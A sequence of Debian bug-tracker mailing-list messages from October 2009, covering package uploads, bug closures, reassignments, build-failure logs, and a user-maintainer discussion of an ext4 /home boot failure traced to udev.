quodlibet quodlibet-ext Architecture: source all i386 Version: 2.1-4 Distribution: unstable Urgency: low Maintainer: Tristan Seligmann mithra...@mithrandi.net Changed-By: Christine Spang christ...@debian.org Description: exfalso- audio tag editor for GTK+ quodlibet - audio library manager and player for GTK+ quodlibet-ext - extensions for the Quod Libet audio player Closes: 552288 Changes: quodlibet (2.1-4) unstable; urgency=low . * Install icons in {quodlibet,exfalso}.install, not in debian/rules. (Closes: #552288) Checksums-Sha1: 723549df1c84315b70e7cb617891e7570c6a7cd7 1320 quodlibet_2.1-4.dsc a3d49a1df7966f74bc178d56ee2428ec72f64b81 7699 quodlibet_2.1-4.diff.gz f45a397371c069a167dd2d31c3b1cc8759e5bc30 559562 exfalso_2.1-4_all.deb e1a112a9d794e0967dd41510ab68db3b0e4b659e 30828 quodlibet_2.1-4_all.deb f411c0b968ab1c1dc44f5ef5326af28771d249bb 27070 quodlibet-ext_2.1-4_i386.deb Checksums-Sha256: 9ef0e1ce0780e8289f111783215ca2ad7e7431703bb181264250ee18214bf426 1320 quodlibet_2.1-4.dsc 9798035be4b370a10d9eb249e1d67476a6373940c2423b3caccbf5415b2413ff 7699 quodlibet_2.1-4.diff.gz cb1ea469f6aeacaccb85d1fc318c6df3f2d8bb7267ddb4e45922d2a5e7979a81 559562 exfalso_2.1-4_all.deb c295ca8f8e8c49d517b647071783028afa814f8b607b45e1bd90773544670e34 30828 quodlibet_2.1-4_all.deb ad3ff071e692a6bdd5571d45243fe19f389e20ec5b4d23ba2aaaba20997bf0a4 27070 quodlibet-ext_2.1-4_i386.deb Files: fc05e20091e8a24bd45b7a2d33edaca2 1320 sound optional quodlibet_2.1-4.dsc 92871fea4ffdbf3f4dfca3723e46fc27 7699 sound optional quodlibet_2.1-4.diff.gz a27f1b2f0f29cca70bcfded13d65c061 559562 sound optional exfalso_2.1-4_all.deb 369f4da6e78850729710fdbc594d36be 30828 sound optional quodlibet_2.1-4_all.deb b374ba352ba6ace227a1c2216c5c9a71 27070 sound optional quodlibet-ext_2.1-4_i386.deb -BEGIN PGP
Bug#550826: marked as done (pulseaudio: FTBFS on kfreebsd-* and hurd-*: libudev-dev notinstallable)
Your message dated Sun, 25 Oct 2009 16:11:26 + with message-id e1n25gk-0008bx...@ries.debian.org and subject line Bug#550826: fixed in pulseaudio 0.9.19-2 has caused the Debian Bug report #550826, regarding pulseaudio: FTBFS on kfreebsd-* and hurd-*: libudev-dev notinstallable to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 550826: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550826 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: pulseaudio Version: 0.9.19-1 Severity: serious Justification: FTBFS Hello, Pulseaufio FTBFS on kfreebsd-* (and hurd-*) has libudev-dev is not present on these arch. Likewise the depedencies on udev will make the package uninstallable -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/4 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash ---End Message--- ---BeginMessage--- Source: pulseaudio Source-Version: 0.9.19-2 We believe that the bug you reported is fixed in the latest version of pulseaudio, which is due to be installed in the Debian FTP archive: libpulse-browse0-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse-browse0-dbg_0.9.19-2_amd64.deb libpulse-browse0_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse-browse0_0.9.19-2_amd64.deb libpulse-dev_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse-dev_0.9.19-2_amd64.deb libpulse-mainloop-glib0-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.19-2_amd64.deb libpulse-mainloop-glib0_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.19-2_amd64.deb libpulse0-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse0-dbg_0.9.19-2_amd64.deb libpulse0_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/libpulse0_0.9.19-2_amd64.deb pulseaudio-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-dbg_0.9.19-2_amd64.deb pulseaudio-esound-compat-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.19-2_amd64.deb pulseaudio-esound-compat_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.19-2_amd64.deb pulseaudio-module-bluetooth-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-bluetooth-dbg_0.9.19-2_amd64.deb pulseaudio-module-bluetooth_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-bluetooth_0.9.19-2_amd64.deb pulseaudio-module-gconf-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.19-2_amd64.deb pulseaudio-module-gconf_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-gconf_0.9.19-2_amd64.deb pulseaudio-module-hal-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.19-2_amd64.deb pulseaudio-module-hal_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-hal_0.9.19-2_amd64.deb pulseaudio-module-jack-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.19-2_amd64.deb pulseaudio-module-jack_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-jack_0.9.19-2_amd64.deb pulseaudio-module-lirc-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.19-2_amd64.deb pulseaudio-module-lirc_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-lirc_0.9.19-2_amd64.deb pulseaudio-module-raop-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-raop-dbg_0.9.19-2_amd64.deb pulseaudio-module-raop_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-raop_0.9.19-2_amd64.deb pulseaudio-module-x11-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.19-2_amd64.deb pulseaudio-module-x11_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-x11_0.9.19-2_amd64.deb pulseaudio-module-zeroconf-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.19-2_amd64.deb pulseaudio-module-zeroconf_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.19-2_amd64.deb pulseaudio-utils-dbg_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.19-2_amd64.deb pulseaudio-utils_0.9.19-2_amd64.deb to pool/main/p/pulseaudio/pulseaudio-utils_0.9.19-2_amd64.deb pulseaudio_0.9.19-2.diff.gz to pool/main/p/pulseaudio/pulseaudio_0.9.19-2.diff.gz pulseaudio_0.9.19-2.dsc to pool/main/p/pulseaudio/pulseaudio_0.9.19-2.dsc pulseaudio_0.9.19-2_amd64.deb to
Processed: fixed 550440 in 1.6.0-13+lenny2
Processing commands for cont...@bugs.debian.org: fixed 550440 1.6.0-13+lenny2 Bug #550440 [advi] advi: CVE-2009-2295 arbitrary code execution Bug #551282 [advi] advi: integer overflows in camlimages There is no source info for the package 'advi' at version '1.6.0-13+lenny2' with architecture '' Unable to make a source version for version '1.6.0-13+lenny2' Bug Marked as fixed in versions 1.6.0-13+lenny2. Bug Marked as fixed in versions 1.6.0-13+lenny2. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546848: marked as done (Failed to upgrade package)
Your message dated Sun, 25 Oct 2009 17:32:14 + with message-id e1n26ww-00013h...@ries.debian.org and subject line Bug#546848: fixed in isight-firmware-tools 1.4.2-3 has caused the Debian Bug report #546848, regarding Failed to upgrade package to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 546848: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546848 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: isight-firmware-tools Version: 1.4.2-2 Severity: serious Package failed to upgrade to 1.4.2-2 due to following error. 10:32:04-kar...@olive:~$ upgrade [sudo] password for kartik: Reading package lists... Done Building dependency tree Reading state information... Done The following packages have been kept back: bzrtools 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded. 1 not fully installed or removed. After this operation, 0B of additional disk space will be used. Do you want to continue [Y/n]? Y Setting up isight-firmware-tools (1.4.2-2) ... /var/lib/dpkg/info/isight-firmware-tools.postinst: line 12: 3625 Aborted $EXTRACT --apple-driver $RET /dev/null 21 dpkg: error processing isight-firmware-tools (--configure): subprocess installed post-installation script returned error exit status 134 Errors were encountered while processing: isight-firmware-tools localepurge: Disk space freed in /usr/share/locale: 328 KiB localepurge: Disk space freed in /usr/share/man: 0 KiB localepurge: Disk space freed in /usr/share/gnome/help: 0 KiB localepurge: Disk space freed in /usr/share/omf: 0 KiB Total disk space freed by localepurge: 328 KiB E: Sub-process /usr/bin/dpkg returned an error code (1) Let me know if you want more info. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (101, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_IN, LC_CTYPE=en_IN (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages isight-firmware-tools depends on: ii debconf [debconf-2.0] 1.5.27 Debian configuration management sy ii dpkg 1.15.4 Debian package management system ii hal 0.5.13-3 Hardware Abstraction Layer ii install-info 4.13a.dfsg.1-4 Manage installed documentation in ii libc6 2.9-26 GNU C Library: Shared libraries ii libdbus-1-3 1.2.16-2 simple interprocess messaging syst ii libgcrypt11 1.4.4-4LGPL Crypto library - runtime libr ii libglib2.0-0 2.20.5-1 The GLib library of C routines ii libhal1 0.5.13-3 Hardware Abstraction Layer - share ii libusb-0.1-4 2:0.1.12-13userspace USB programming library isight-firmware-tools recommends no packages. isight-firmware-tools suggests no packages. -- debconf information: isight-firmware-tools/extract_fail: isight-firmware-tools/file_not_exist: * isight-firmware-tools/extract_success: * isight-firmware-tools/extract: true * isight-firmware-tools/driver-location: /media/macdata/System/Library/Extensions/IOUSBFamily.kext/Contents/PlugIns/AppleUSBVideoSupport.kext/Contents/MacOS/AppleUSBVideoSupport ---End Message--- ---BeginMessage--- Source: isight-firmware-tools Source-Version: 1.4.2-3 We believe that the bug you reported is fixed in the latest version of isight-firmware-tools, which is due to be installed in the Debian FTP archive: isight-firmware-tools_1.4.2-3.diff.gz to pool/contrib/i/isight-firmware-tools/isight-firmware-tools_1.4.2-3.diff.gz isight-firmware-tools_1.4.2-3.dsc to pool/contrib/i/isight-firmware-tools/isight-firmware-tools_1.4.2-3.dsc isight-firmware-tools_1.4.2-3_i386.deb to pool/contrib/i/isight-firmware-tools/isight-firmware-tools_1.4.2-3_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 546...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Nobuhiro Iwamatsu iwama...@debian.org (supplier of updated isight-firmware-tools package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Mon, 26 Oct 2009 00:42:45
Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
Petter Reinholdtsen wrote: [Thveillon] They have different sata controllers, and they don't display this behavior in neither Fedora11 (tested on the Desktop) and Ubuntu Karmic (on the laptop). Both use event based boot, as far as I know, which solve the fundamental problem with the changed kernel behaviour. Did it work with Debian Lenny? The laptop is too new to be used easily with Lenny, but it was working properly with Squeeze prior to the insserv migration. The desktop has been running Lenny during most of it Testing cycle, and beginning of the Stable one. It ran Squeeze before the insserv migration too. Let me know if I can provide any other information, or provide logs from a boot on a standard Debian kernel (those attached are from a custom one). Logs from a standard kernel would be nice, to see if device timings or driver load order is different. The output from 'ls /etc/rc?.d', 'ls -l $(grep -v '#' /etc/fstab|awk '/dev/ {print $1}') /dev/rtc*' and 'cat /etc/default/rcS' would be nice too. The system seem to be without udev. Is that correct? I noticed from the boot log that the hardware clock is not set correctly either, because the rtc devices are missing. Following your message I did various tests, it seems that the failing fsck is just a symptom after all, not the cause of the problem. The clock not being set correctly because /dev/rtc doesn't exist is only happening during a failed boot, not a normal one. As you'll see in the output of the commands the /dev/rtc* are there. After the failed boots I have various and semi-random other problems if I try to go past the rescue shell. /home isn't mounted, and not mountable, but I also sometime lose the keyboard/mouse(trackpad), the wifi card doesn't come up, and such... Both machines are *with* udev, but it doesn't work during the failed boots and I believe udev is the root of all other problems. There's so many bugs open right now that it won't come has a big surprise. Why do you make your own kernel? Anything special about its configuration? I use custom kernels for various reasons, curiosity being one. On the laptop the sound is only (kind of) working with 2.6.30* and up, which wasn't available when I first installed Debian on it, and is now fully working with 2.6.31*. On both I use desktop settings (1000Mhz, voluntary preemption), set the Core2 or newer cpu type, remove debug or devel related options, remove Xen related options, remove the v4l1 (using v4l1-compat only) and use only the old IEEE1394 stack (I think it's the default too on Debian kernels now) since some of my video and scanner equipment doesn't work properly otherwise. I can provide a diff if desired, but I had the same behavior with both custom and Debian kernels. Since tomorrow (Monday here) I'll need working machines I ended up restoring older system from backups, it now runs fine again (with the same kernels). I guess I'll wait until next week-end to upgrade again... Showing up in front of the classroom to display on a large screen a black screen of death isn't exactly a good way to promote Debian ! (My wife's a teacher and use the laptop at work). Sorry for the waste of time, you can dismiss the bug report since I worked around the problem for now, and I think it's udev related in the first place anyway. I'll reopen it if it happens again on next upgrade. Happy hacking, Have a nice week, and a nice Skolelinux gathering/conference. Thank you for your attention. Desktop machine : Squeeze AMD64, raid1, ext4, custom kernel 2.6.31.5 ls /etc/rc?.d /etc/rc0.d: K01acctK01fancontrol K01kvm K01openbsd-inetd K01vboxdrv K02avahi-daemon K08ifupdown K01alsa-utils K01fuseK01mdadm K01resolvconf K01wicd K04sysklogd K09umountfs K01anacron K01hddtemp K01mdadm-raid K01rsync K01winbind K05hwclock.shK10umountroot K01atd K01kdm K01mt-daapdK01samba K01wpa-ifupdown K05sendsigs K11halt K01dirmngr K01kerneloops K01ntp K01saned K01xfs K06umountnfs.sh README K01exim4 K01klogd K01nvidia-glx K01urandomK01xl2tpd K07networking /etc/rc1.d: K01acct K01exim4 K01kerneloops K01ntpK01samba K01winbind K02cups S22bootlogs K01anacron K01fancontrol K01klogd K01nvidia-glx K01saned K01xfs K03dbus S23bootchart K01atd K01hal K01kvm K01nvidia-kernel K01smartmontools K01xl2tpdK04sysklogd S23single K01cron K01hddtemp K01mdadm K01openbsd-inetd K01vboxdrv K02acpid README K01dirmngr K01kdm K01mt-daapdK01rsync K01wicd K02avahi-daemon
Bug#551146: marked as done (firmware-linux-nonfree: undeclared conflict with firmware-linux 0.18)
Your message dated Sun, 25 Oct 2009 17:43:38 + with message-id e1n277y-0002ew...@ries.debian.org and subject line Bug#551146: fixed in firmware-nonfree 0.20 has caused the Debian Bug report #551146, regarding firmware-linux-nonfree: undeclared conflict with firmware-linux 0.18 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 551146: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=551146 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: firmware-linux-nonfree Version: 0.19 Severity: serious Justification: squeeze RC policy §2 With firmware-linux 0.18 installed, attempting to install firmware-linux-nonfree results in the following error: Unpacking firmware-linux-nonfree (from .../firmware-linux-nonfree_0.19_all.deb) ... dpkg: error processing /var/cache/apt/archives/firmware-linux-nonfree_0.19_all.deb (--unpack): trying to overwrite `/lib/firmware/tigon/tg3_tso.bin', which is also in package firmware-linux -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (500, 'testing'), (400, 'unstable'), (300, 'experimental') Architecture: i386 (x86_64) Kernel: Linux 2.6.31 (SMP w/2 CPU cores) Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash firmware-linux-nonfree depends on no packages. firmware-linux-nonfree recommends no packages. Versions of packages firmware-linux-nonfree suggests: ii initramfs-tools 0.93.4 tools for generating an initramfs ii linux-image-2.6. 2.6.31-1~experimental.2 Linux 2.6.31 for 64-bit PCs -- no debconf information ---End Message--- ---BeginMessage--- Source: firmware-nonfree Source-Version: 0.20 We believe that the bug you reported is fixed in the latest version of firmware-nonfree, which is due to be installed in the Debian FTP archive: firmware-bnx2_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-bnx2_0.20_all.deb firmware-bnx2x_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-bnx2x_0.20_all.deb firmware-intelwimax_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-intelwimax_0.20_all.deb firmware-ipw2x00_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-ipw2x00_0.20_all.deb firmware-ivtv_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-ivtv_0.20_all.deb firmware-iwlwifi_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-iwlwifi_0.20_all.deb firmware-linux-nonfree_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-linux-nonfree_0.20_all.deb firmware-linux_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-linux_0.20_all.deb firmware-nonfree_0.20.dsc to pool/non-free/f/firmware-nonfree/firmware-nonfree_0.20.dsc firmware-nonfree_0.20.tar.gz to pool/non-free/f/firmware-nonfree/firmware-nonfree_0.20.tar.gz firmware-qlogic_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-qlogic_0.20_all.deb firmware-ralink_0.20_all.deb to pool/non-free/f/firmware-nonfree/firmware-ralink_0.20_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 551...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Bastian Blank wa...@debian.org (supplier of updated firmware-nonfree package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sat, 24 Oct 2009 22:16:37 +0200 Source: firmware-nonfree Binary: firmware-linux firmware-bnx2 firmware-bnx2x firmware-intelwimax firmware-ipw2x00 firmware-ivtv firmware-iwlwifi firmware-linux-nonfree firmware-qlogic firmware-ralink Architecture: source all Version: 0.20 Distribution: experimental Urgency: low Maintainer: Debian Kernel Team debian-ker...@lists.debian.org Changed-By: Bastian Blank wa...@debian.org Description: firmware-bnx2 - Binary firmware for Broadcom NetXtremeII firmware-bnx2x - Binary firmware for Broadcom NetXtreme II 10Gb firmware-intelwimax - Binary firmware for Intel WiMAX Connection firmware-ipw2x00 - Binary firmware for Intel Pro Wireless 2100, 2200 and 2915 firmware-ivtv - Binary firmware for iTVC15-family MPEG codecs (ivtv and pvrusb2 d firmware-iwlwifi - Binary firmware for Intel Wireless 3945, 4965 and 5000-series car firmware-linux - Binary firmware for various drivers in the Linux kernel
Processed: Re: Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
Processing commands for cont...@bugs.debian.org: reassign 552248 udev Bug #552248 [initscripts] initscripts: checkfs.sh fails with device doesn't exist on ext4 /home partitions (two different computers) Bug reassigned from package 'initscripts' to 'udev'. Bug No longer marked as found in versions sysvinit/2.87dsf-6. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
reassign 552248 udev thanks Well, if the issue is udev related, it should be reassigned to udev. Happy hacking, -- Petter Reinholdtsen -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
Your report is less than helpful, but it looks like another manifestation of #535130. -- ciao, Marco signature.asc Description: Digital signature
Processed: reassign 552094 to kde-style-skulpture
Processing commands for cont...@bugs.debian.org: reassign 552094 kde-style-skulpture Bug #552094 [kde-style-skulpture] [qt4-designer] Crash on Marble plugins loading Ignoring request to reassign bug #552094 to the same package End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552365: Package uninstallable
Package: epiphany-extensions-more Version: 2.26.1 Severity: serious Hi, epiphany-extensions-more is currently uninstallable on unstable due to the dependencies epiphany-extensions (= 2.26), epiphany-extensions ( 2.27) Regards Laurent Bigonville -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#549737: libgnucrypto-java: FTBFS: rm: cannot remove `debian/libgnucrypto-java/usr/share/info/dir': No such file or directory
On Mon, Oct 05, 2009 at 08:54:45PM +0200, Lucas Nussbaum wrote: Source: libgnucrypto-java Version: 2.1.0-3 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20091005 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: make[3]: Entering directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[3]: Nothing to be done for `install-exec-am'. make[3]: Nothing to be done for `install-data-am'. make[3]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[2]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' make[1]: Leaving directory `/build/user-libgnucrypto-java_2.1.0-3-amd64-KtKw9k/libgnucrypto-java-2.1.0' dh_installdirs -plibgnucrypto-java dh_installdocs -plibgnucrypto-java ./README ./AUTHORS ./THANKS dh_installexamples -plibgnucrypto-java dh_installman -plibgnucrypto-java dh_installinfo -plibgnucrypto-java dh_installmenu -plibgnucrypto-java dh_installcron -plibgnucrypto-java dh_installinit -plibgnucrypto-java dh_installdebconf -plibgnucrypto-java dh_installemacsen -plibgnucrypto-java dh_installcatalogs -plibgnucrypto-java dh_installpam -plibgnucrypto-java dh_installlogrotate -plibgnucrypto-java dh_installlogcheck -plibgnucrypto-java dh_installchangelogs -plibgnucrypto-java ./ChangeLog dh_installudev -plibgnucrypto-java dh_lintian -plibgnucrypto-java dh_install -plibgnucrypto-java dh_link -plibgnucrypto-java dh_installmime -plibgnucrypto-java touch debian/libgnucrypto-java/etc/java/security/security.d/3000-gnu.crypto.jce.GnuCrypto rm: cannot remove `debian/libgnucrypto-java/usr/share/info/dir': No such file or directory make: *** [binary-install/libgnucrypto-java] Error 1 I just tried locally in pbuilder and the rm above did not failed and the package build successfully. Is this FTBFS still reproducible for you? Or was the bug somewhere else and got fixed already? Cheers, Michael -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552304: FTBFS on PPC and mips
Florian Weimer wrote: * Laurent Bigonville: Looks like tcl8.4 still installed [...] checking for tclsh8.4... tclsh8.4 [...] Thanks. Either the package must override the ./configure logic, or build-conflict with tcl8.4(-dev). Right, a build conflict should certainly be considered. Cheers Luk -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: tagging as pending bugs that are closed by packages in NEW
Processing commands for cont...@bugs.debian.org: # Sun Oct 25 19:03:09 UTC 2009 # Tagging as pending bugs that are closed by packages in NEW # http://ftp-master.debian.org/new.html # # Source package in NEW: openvrml tags 490334 + pending Bug #490334 [openvrml] openvrml: FTBFS: Nonexistent build-dependency: libxul-dev Added tag(s) pending. # Source package in NEW: openvrml tags 534055 + pending Bug #534055 [openvrml] openvrml: FTBFS: Nonexistent build-dependency: libgcj-dev Added tag(s) pending. # Source package in NEW: openvrml tags 336526 + pending Bug #336526 [openvrml] openvrml - FTBFS: needs awful amounts of memory to build Added tag(s) pending. # Source package in NEW: ossim tags 551631 + pending Bug #551631 [wnpp] ITP: ossim -- The OSSIM library Added tag(s) pending. # Source package in NEW: apron tags 552326 + pending Bug #552326 [wnpp] ITP: apron -- An abstract interpretation library Added tag(s) pending. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#548477: marked as done (classpath: FTBFS on alpha: The literal 1.4e-45f of type float is out of range)
Your message dated Sun, 25 Oct 2009 18:47:43 + with message-id e1n287z-00027v...@ries.debian.org and subject line Bug#548477: fixed in classpath 2:0.98-5 has caused the Debian Bug report #548477, regarding classpath: FTBFS on alpha: The literal 1.4e-45f of type float is out of range to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 548477: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548477 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Source: classpath Version: 2:0.98-4 Severity: serious Hi, There was an error while trying to autobuild your package: Start Time: 20090911-1046 [...] Build-Depends: debhelper (= 5), ecj, gcj, zip, libgtk2.0-dev, libgconf2-dev, libart-2.0-dev, libx11-dev, libice-dev, libxt-dev, libxtst-dev, libasound2-dev [!hurd-i386 !kfreebsd-i386 !kfreebsd-amd64], libcairo2-dev, dpatch, libqt4-dev (= 4.1.0), dssi-dev [!hurd-i386 !kfreebsd-i386 !kfreebsd-amd64], xulrunner-dev (= 1.9), libmagic-dev [...] Toolchain package versions: libc6.1-dev_2.9-26 linux-libc-dev_2.6.30-6 g++-4.3_4.3.4-2 gcc-4.3_4.3.4-2 binutils_2.19.90.20090909-1 libstdc++6_4.4.1-3 libstdc++6-4.3-dev_4.3.4-2 [...] -- 3208. ERROR in ../java/lang/Float.java (at line 76) public static final float MIN_VALUE = 1.4e-45f; The literal 1.4e-45f of type float is out of range -- [...] -- 10212 problems (1 error, 10211 warnings)make[2]: *** [compile-classes] Error 255 make[1]: *** [install-recursive] Error 1 make: *** [install] Error 2 dpkg-buildpackage: error: /usr/bin/fakeroot debian/rules binary-arch gave error exit status 2 make[2]: Leaving directory `/build/buildd-classpath_0.98-4-alpha-UBnhuT/classpath-0.98/lib' make[1]: Leaving directory `/build/buildd-classpath_0.98-4-alpha-UBnhuT/classpath-0.98' A full build log can be found at: http://buildd.debian.org/build.php?arch=alphapkg=classpathver=2:0.98-4 Kurt ---End Message--- ---BeginMessage--- Source: classpath Source-Version: 2:0.98-5 We believe that the bug you reported is fixed in the latest version of classpath, which is due to be installed in the Debian FTP archive: classpath-common-unzipped_0.98-5_all.deb to pool/main/c/classpath/classpath-common-unzipped_0.98-5_all.deb classpath-common_0.98-5_all.deb to pool/main/c/classpath/classpath-common_0.98-5_all.deb classpath-doc_0.98-5_all.deb to pool/main/c/classpath/classpath-doc_0.98-5_all.deb classpath-gtkpeer_0.98-5_amd64.deb to pool/main/c/classpath/classpath-gtkpeer_0.98-5_amd64.deb classpath-qtpeer_0.98-5_amd64.deb to pool/main/c/classpath/classpath-qtpeer_0.98-5_amd64.deb classpath_0.98-5.diff.gz to pool/main/c/classpath/classpath_0.98-5.diff.gz classpath_0.98-5.dsc to pool/main/c/classpath/classpath_0.98-5.dsc classpath_0.98-5_amd64.deb to pool/main/c/classpath/classpath_0.98-5_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 548...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Michael Koch konque...@gmx.de (supplier of updated classpath package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP 